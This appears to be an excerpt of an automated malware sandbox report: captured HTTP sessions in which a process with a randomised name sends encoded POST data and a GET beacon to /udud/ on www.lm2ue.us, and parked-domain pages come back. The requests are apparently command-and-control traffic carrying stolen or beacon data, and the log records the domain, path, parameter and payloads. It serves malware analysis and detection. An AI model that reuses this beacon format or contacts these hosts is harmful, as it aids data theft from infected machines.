                                                                                                Data Raw: 37 37 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 61 76 6f 63 61 74 6d 68 2e 6f 72 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 [TRUNCATED]
                                                                                                Data Ascii: 77f<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>avocatmh.org</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://who [TRUNCATED]
                                                                                                May 27, 2024 12:33:37.632949114 CEST826INData Raw: 6f 72 67 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68 65 20 64 6f 6d 61 69 6e e2 80 99 73 20 70 75 62 6c 69 63 20 72 65 67 69 73 74 72 61 74 69 6f 6e 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c
                                                                                                Data Ascii: org</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-borderbox_1Gwb_"><span class="Parking_2023-infobox_DMd
                                                                                                May 27, 2024 12:33:37.632960081 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                33192.168.11.304986391.195.240.123807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:42.997051001 CEST727OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.lm2ue.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.lm2ue.us
                                                                                                Referer: http://www.lm2ue.us/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 35 64 47 4e 33 4c 47 49 63 30 43 37 68 46 68 38 50 70 4a 64 33 69 39 61 73 33 4b 34 49 41 71 30 45 31 49 4e 4f 53 4d 68 42 30 4e 43 50 30 54 73 48 4e 38 47 78 66 55 68 68 32 54 73 70 36 6c 4f 4b 66 4d 6f 65 44 78 34 4b 57 6a 56 6a 79 63 64 32 51 5a 6f 53 43 32 4b 4a 30 41 7a 63 61 36 31 76 39 68 47 48 37 63 63 52 6e 44 55 68 67 34 73 58 30 2b 56 5a 6c 32 79 62 4f 32 6b 72 46 6f 70 52 49 75 56 46 74 58 63 62 4e 72 49 7a 67 75 58 4b 69 47 79 71 36 36 56 57 75 67 4e 4c 48 6e 67 41 4c 6a 4c 41 4a 47 59 46 55 4b 62 6b 6e 62 52 4a 45 78 2f 70 31 6f 74 67 6e 48 72 53 4e 35 74 52 41 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=5dGN3LGIc0C7hFh8PpJd3i9as3K4IAq0E1INOSMhB0NCP0TsHN8GxfUhh2Tsp6lOKfMoeDx4KWjVjycd2QZoSC2KJ0Azca61v9hGH7ccRnDUhg4sX0+VZl2ybO2krFopRIuVFtXcbNrIzguXKiGyq66VWugNLHngALjLAJGYFUKbknbRJEx/p1otgnHrSN5tRA==
                                                                                                May 27, 2024 12:33:43.188915968 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:33:43 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                34192.168.11.304986491.195.240.123807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:45.715686083 CEST747OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.lm2ue.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.lm2ue.us
                                                                                                Referer: http://www.lm2ue.us/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 35 64 47 4e 33 4c 47 49 63 30 43 37 75 45 52 38 41 71 78 64 69 53 39 64 77 6e 4b 34 61 41 71 77 45 31 4d 4e 4f 58 74 36 42 42 64 43 4f 57 62 73 47 49 41 47 79 66 55 68 75 57 54 70 6e 61 6c 56 4b 66 49 61 65 43 4e 34 4b 57 33 56 6a 79 4d 64 6a 7a 77 2b 51 53 32 55 43 55 41 78 42 4b 36 31 76 39 68 47 48 37 49 32 52 6e 62 55 67 51 49 73 57 56 2b 55 48 31 32 7a 59 4f 32 6b 76 46 6f 58 52 49 75 6a 46 6f 32 4c 62 4c 33 49 7a 68 65 58 45 54 47 31 6c 36 36 58 4a 65 68 38 47 48 32 66 41 49 71 38 4e 4a 6a 4c 4e 55 50 2b 6f 51 71 4c 55 48 46 39 36 56 55 41 38 6d 71 44 51 50 34 32 4d 44 68 6b 41 32 4c 51 56 66 73 2f 47 61 32 70 43 69 4f 48 73 5a 38 3d
                                                                                                Data Ascii: Pl9P8ldX=5dGN3LGIc0C7uER8AqxdiS9dwnK4aAqwE1MNOXt6BBdCOWbsGIAGyfUhuWTpnalVKfIaeCN4KW3VjyMdjzw+QS2UCUAxBK61v9hGH7I2RnbUgQIsWV+UH12zYO2kvFoXRIujFo2LbL3IzheXETG1l66XJeh8GH2fAIq8NJjLNUP+oQqLUHF96VUA8mqDQP42MDhkA2LQVfs/Ga2pCiOHsZ8=
                                                                                                May 27, 2024 12:33:46.057009935 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:33:45 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                35192.168.11.304986591.195.240.123807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:48.436600924 CEST1664OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.lm2ue.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.lm2ue.us
                                                                                                Referer: http://www.lm2ue.us/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 35 64 47 4e 33 4c 47 49 63 30 43 37 75 45 52 38 41 71 78 64 69 53 39 64 77 6e 4b 34 61 41 71 77 45 31 4d 4e 4f 58 74 36 42 42 56 43 4f 6a 50 73 48 72 6f 47 7a 66 55 68 77 6d 54 6f 6e 61 6b 56 4b 62 64 52 65 43 41 61 4b 56 50 56 67 52 55 64 6e 79 77 2b 61 53 32 55 4e 30 41 77 63 61 36 67 76 35 45 42 48 37 59 32 52 6e 62 55 67 57 6b 73 54 30 2b 55 46 31 32 79 62 4f 32 6f 72 46 6f 73 52 49 32 7a 46 6f 37 32 62 39 48 49 7a 43 6d 58 47 68 75 31 36 4b 36 52 49 65 68 6b 47 48 36 2b 41 49 48 46 4e 4a 57 57 4e 55 48 2b 72 6b 76 66 50 45 6c 66 76 32 59 7a 7a 69 53 46 52 5a 70 68 46 53 52 66 50 31 62 30 56 38 56 55 41 63 43 42 5a 68 69 38 37 66 45 71 65 45 36 4d 73 76 59 6c 48 58 4c 4b 59 4c 58 56 65 78 47 30 70 77 2f 33 57 58 35 55 38 32 6a 71 47 46 42 6d 70 61 36 70 56 59 48 30 54 69 7a 57 69 43 72 32 67 53 64 57 2f 55 49 62 33 33 68 71 46 77 78 47 59 6b 71 5a 4c 74 38 37 2f 67 4c 62 7a 55 77 36 45 41 30 63 6a 38 53 7a 6d 64 55 47 53 62 46 51 53 70 47 71 6d 37 2b 75 59 75 50 32 46 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=5dGN3LGIc0C7uER8AqxdiS9dwnK4aAqwE1MNOXt6BBVCOjPsHroGzfUhwmTonakVKbdReCAaKVPVgRUdnyw+aS2UN0Awca6gv5EBH7Y2RnbUgWksT0+UF12ybO2orFosRI2zFo72b9HIzCmXGhu16K6RIehkGH6+AIHFNJWWNUH+rkvfPElfv2YzziSFRZphFSRfP1b0V8VUAcCBZhi87fEqeE6MsvYlHXLKYLXVexG0pw/3WX5U82jqGFBmpa6pVYH0TizWiCr2gSdW/UIb33hqFwxGYkqZLt87/gLbzUw6EA0cj8SzmdUGSbFQSpGqm7+uYuP2F9sSE/85oABcKwcSQpnK0fPxhi91SlDcmrAdekr2AxC9feHk43xC699UisqvRcXFk3GidtETzgMMTKv+l9Zl25z2eXNSHGy7Jk0MKbi+znKd5LnUM7pLcqKlNcB+pDqQQlyLk9WKE4gqU8vMR06llVHueziYkgp2n+s0c7dfac5saqoVlGN0CqLH1Ld9yiixHfnTgs5Lr9yTOOrLlPvfI2Y4N+2DRQYVv/pR865STOrpG4Jm/DmkI+JgzwhNXJSTeAprpMgtdG+1hG4nDVRereO9nYmziVQicG5JXlL6vqBg5i01HQ1xFjIu4Qp67neF6jb5eqq42zzeIUiZKdr8FqS/kGKrMkMq4wA4KsgeiJkM4lrpgRRBImmx7lGdwetNT8+UGSyTu3BVe5tGnr4i+Dp2/xoPyal3jrgjm9iqYPSNJFffWxnkHDe8efFDTKTDwkzRGKyxqLbtgqvACohkTWBE896zUjK2Qy4mdnyIIUJc+eNvrNDBp6YvEev0X7A6Muy5OoPJ6sfz/SsPz7mZ8rIVfObgOgtVPMklW3iDieLJss9rqoz5mmwsq5DMeNHFNBOuF0DpNgs/HIwAFkf2Iq3qJnd358NoOOT8rFFVbPQkNUCOmW1mA53EBEK6UcNagDwOK6c3Mc4gYHF5g3ll7kRIFoPtt/LRZXi [TRUNCATED]
                                                                                                May 27, 2024 12:33:48.627268076 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:33:48 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                36192.168.11.304986691.195.240.123807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:51.153017044 CEST473OUTGET /udud/?Pl9P8ldX=0fut0+GuUFbft3VBL5xm0Hp90TDKfhipdS4VXGxzAEleMWehH5gQwP182GbMnYpRKYVXdyZjU035jwIjvCFAGk2/B20KDJmRwuIeT4QhTHXMvWA5X1/HJWk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.lm2ue.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:33:51.404592037 CEST1289INHTTP/1.1 200 OK
                                                                                                date: Mon, 27 May 2024 10:33:51 GMT
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                transfer-encoding: chunked
                                                                                                vary: Accept-Encoding
                                                                                                x-powered-by: PHP/8.1.17
                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                pragma: no-cache
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_w6j8DONnSgvrxKYmcBlJlV3z7JyNe9iQk+ZDyTSWUu7+o1DhXheYjnTPI4l6r6OruPL3Bv5PjHhXemcv7swS2A==
                                                                                                last-modified: Mon, 27 May 2024 10:33:51 GMT
                                                                                                x-cache-miss-from: parking-6cfd44ff49-ljb5v
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Raw: 32 43 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 77 36 6a 38 44 4f 4e 6e 53 67 76 72 78 4b 59 6d 63 42 6c 4a 6c 56 33 7a 37 4a 79 4e 65 39 69 51 6b 2b 5a 44 79 54 53 57 55 75 37 2b 6f 31 44 68 58 68 65 59 6a 6e 54 50 49 34 6c 36 72 36 4f 72 75 50 4c 33 42 76 35 50 6a 48 68 58 65 6d 63 76 37 73 77 53 32 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6c 6d 32 75 65 2e 75 73 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6c 6d 32 75 65 20 52 65 73 6f 75 [TRUNCATED]
                                                                                                Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_w6j8DONnSgvrxKYmcBlJlV3z7JyNe9iQk+ZDyTSWUu7+o1DhXheYjnTPI4l6r6OruPL3Bv5PjHhXemcv7swS2A==><head><meta charset="utf-8"><title>lm2ue.us&nbsp;-&nbsp;lm2ue Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="lm2ue.us is your first and best source for all of the information youre looking for. From general topics to more
                                                                                                May 27, 2024 12:33:51.404670000 CEST1289INData Raw: 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6c 6d 32 75 65 2e 75 73 20 68 61 73 20 69 74 20 61 6c 6c 2e 20 57 65 20 68 6f 70 65 20 79 6f 75 20 66 69 6e 64 20 77 68 61 74 20
                                                                                                Data Ascii: of what you would expect to find here, lm2ue.us has it all. We hope you find what you are searching for!576"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style>
                                                                                                May 27, 2024 12:33:51.404721975 CEST1289INData Raw: 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69
                                                                                                Data Ascii: ,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}but595ton::-moz-focus-
                                                                                                May 27, 2024 12:33:51.404799938 CEST1289INData Raw: 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 63
                                                                                                Data Ascii: enter;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-bu
                                                                                                May 27, 2024 12:33:51.404867887 CEST479INData Raw: 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e
                                                                                                Data Ascii: nt__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#949494}.con
                                                                                                May 27, 2024 12:33:51.404884100 CEST1289INData Raw: 35 37 36 0d 0a 23 35 66 35 66 35 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 35 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65
                                                                                                Data Ascii: 576#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-al
                                                                                                May 27, 2024 12:33:51.404906034 CEST1289INData Raw: 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 6e 65 63 65 73 73 61 72 79 2d 63 6f 6f 6b 69 65 73 2d 72 6f 77 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 65 65 31 65 33 7d 2e 64 69 73 61 62 6c 65 64 7b 64 69 73 70 6c 61 79 3a 6e
                                                                                                Data Ascii: window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:in576line-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;ma
                                                                                                May 27, 2024 12:33:51.404932022 CEST1289INData Raw: 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 68 65 69 67 68 74 3a 32 36 70 78 3b 77 69 64 74 68 3a 32 36 70 78 3b 6c 65 66 74 3a 34 70 78 3b 62 6f 74 74 6f 6d 3a 34 70 78 3b 62 61
                                                                                                Data Ascii: :before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}6input:
                                                                                                May 27, 2024 12:33:51.404947042 CEST353INData Raw: 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 74 6f 70
                                                                                                Data Ascii: kground:url("//img.sedoparking.com/templates/bg/arrows.png") #0e162e no-repeat top left;background-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;z-index:-1}.container-content__right{background:url("//img.sedoparking.com/
